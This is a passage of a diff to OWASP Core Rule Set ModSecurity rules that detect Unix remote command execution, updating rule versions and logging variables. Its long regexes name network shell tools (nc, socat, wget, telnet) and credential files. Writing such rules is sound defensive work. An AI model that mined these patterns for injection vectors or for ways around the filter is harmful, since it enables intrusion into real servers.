(?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[arx])?|(?:b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|x)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|[ckz][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?f|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dg]|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)|(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:s|z(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?4)?)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|(?:s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?h|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\s\x0b&\)<>\|]" \ "id:932250,\ phase:2,\ block,\ @@ -146,18 +146,18 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:ef[\s\x0b&\)\-<>\|]|g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\x0b&\)<>\|]|proc)|(?:ron|scli)[\s\x0b&\)<>\|])|d(?:iff[\s\x0b&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\x0b&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\x0b&\)<>\|]|l[\s\x0b&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\x0b&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[23]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\x0b&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\x0b&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw|sudo)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:c(?:at|mp)|diff|[ef]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|nsible)|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:ef[\s\x0b&\)\-<>\|]|g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\x0b&\)<>\|]|proc)|(?:ron|scli)[\s\x0b&\)<>\|])|d(?:iff[\s\x0b&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\x0b&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\x0b&\)<>\|]|l[\s\x0b&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op|se)d|rint(?:env|f[\s\x0b&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[23]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\x0b&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\x0b&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw|sudo)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more))|z(?:c(?:at|mp)|diff|[ef]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ "id:932260,\ phase:2,\ block,\ capture,\ t:none,\ msg:'Remote Command Execution: Direct Unix Command Execution',\ - logdata:'Matched Data: %{TX.0} found within %{TX.932260_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ tag:'platform-unix',\ @@ -166,9 +166,8 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ - setvar:'tx.932260_matched_var_name=%{matched_var_name}',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" \ @@ -187,7 +186,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -207,7 +206,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -227,7 +226,7 @@ SecRule REQUEST_HEADERS|REQUEST_LINE 